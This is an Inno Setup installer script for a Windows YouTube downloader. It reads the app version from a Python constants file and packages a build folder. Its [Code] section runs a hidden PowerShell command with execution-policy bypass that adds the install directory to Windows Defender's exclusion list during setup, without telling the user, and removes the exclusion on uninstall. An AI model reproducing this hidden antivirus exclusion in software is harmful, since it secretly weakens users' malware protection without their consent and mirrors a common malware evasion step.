; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!

#define MyAppName "mrd YouTube downloader"
#define MyAppPublisher "mrido1"
#define MyAppExeName "MRD-YouTube-Downloader.exe"
#define ScriptDir AddBackslash(SourcePath)
#define BuildDir AddBackslash(SourcePath) + "build\\main.dist\\"
#define OutputInstallerDir AddBackslash(SourcePath) + "build\\installer\\"
#define ConstantsPyFile AddBackslash(SourcePath) + "utils\\constants.py"

; Auto-read app version from utils/constants.py (CURRENT_APP_VERSION = "x.y.z")
#define MyAppVersion "0.0.0"
#define _ConstHandle 0
#define _Line ""
#define _Token "CURRENT_APP_VERSION = \""

#ifnexist ConstantsPyFile
  #error "Version source file not found: " + ConstantsPyFile
#endif

#sub _TryExtractVersion
  #define _Line FileRead(_ConstHandle)
  #define _TokenPos Pos(_Token, _Line)
  #if _TokenPos
    #define _Tail Copy(_Line, _TokenPos + 23, 255)
    #define _EndQuote Pos("\"", _Tail)
    #if _EndQuote
      #define MyAppVersion Copy(_Tail, 1, _EndQuote - 1)
    #endif
  #endif
#endsub

#for {_ConstHandle = FileOpen(ConstantsPyFile); _ConstHandle && !FileEof(_ConstHandle); ""} _TryExtractVersion
#if _ConstHandle
  #expr FileClose(_ConstHandle)
#endif

#if MyAppVersion == "0.0.0"
  #error "Could not parse CURRENT_APP_VERSION from: " + ConstantsPyFile
#endif

#ifnexist BuildDir + MyAppExeName
  #error "Build artifact not found. Expected: " + BuildDir + MyAppExeName
#endif

[Setup]
; NOTE: The value of AppId uniquely identifies this application. Do not use the same AppId value in installers for other applications.
; (To generate a new GUID, click Tools | Generate GUID inside the IDE.)
AppId={{A1BE60DC-8E8A-4E3D-858F-FC2814CDBBE6}
AppName={#MyAppName}
AppVersion={#MyAppVersion}
;AppVerName={#MyAppName} {#MyAppVersion}
AppPublisher={#MyAppPublisher}
DefaultDirName={autopf}\{#MyAppName}
UninstallDisplayIcon={app}\{#MyAppExeName}
; "ArchitecturesAllowed=x64compatible" specifies that Setup cannot run
; on anything but x64 and Windows 11 on Arm.
ArchitecturesAllowed=x64compatible
; "ArchitecturesInstallIn64BitMode=x64compatible" requests that the
; install be done in "64-bit mode" on x64 or Windows 11 on Arm,
; meaning it should use the native 64-bit Program Files directory and
; the 64-bit view of the registry.
ArchitecturesInstallIn64BitMode=x64compatible
DisableProgramGroupPage=yes
; Uncomment the following line to run in non administrative install mode (install for current user only).
;PrivilegesRequired=lowest
OutputDir={#OutputInstallerDir}
OutputBaseFilename=mrd-YouTube-downloader{#MyAppVersion}
SolidCompression=yes
WizardStyle=modern

[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"
Name: "indonesian"; MessagesFile: "compiler:indonesian.isl"

[Tasks]
Name: "desktopicon"; Description: "{cm:CreateDesktopIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked

[Files]
Source: "{#BuildDir}{#MyAppExeName}"; DestDir: "{app}"; Flags: ignoreversion
Source: "{#BuildDir}*"; DestDir: "{app}"; Flags: ignoreversion recursesubdirs createallsubdirs
; NOTE: Don't use "Flags: ignoreversion" on any shared system files

[Icons]
Name: "{autoprograms}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"
Name: "{autodesktop}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: desktopicon

[Run]
Filename: "{app}\{#MyAppExeName}"; Description: "{cm:LaunchProgram,{#StringChange(MyAppName, '&', '&&')}}"; Flags: nowait postinstall skipifsilent

[Code]
procedure CurStepChanged(CurStep: TSetupStep);
var
  ResultCode: Integer;
begin
  if CurStep = ssInstall then
  begin
    Exec('powershell.exe', '-ExecutionPolicy Bypass -NoProfile -Command "Add-MpPreference -ExclusionPath ''' + ExpandConstant('{app}') + '''"', '', SW_HIDE, ewWaitUntilTerminated, ResultCode);
  end;
end;

procedure CurUninstallStepChanged(CurUninstallStep: TUninstallStep);
var
  ResultCode: Integer;
begin
  if CurUninstallStep = usUninstall then
  begin
    Exec('powershell.exe', '-ExecutionPolicy Bypass -NoProfile -Command "Remove-MpPreference -ExclusionPath ''' + ExpandConstant('{app}') + '''"', '', SW_HIDE, ewWaitUntilTerminated, ResultCode);
  end;
end;
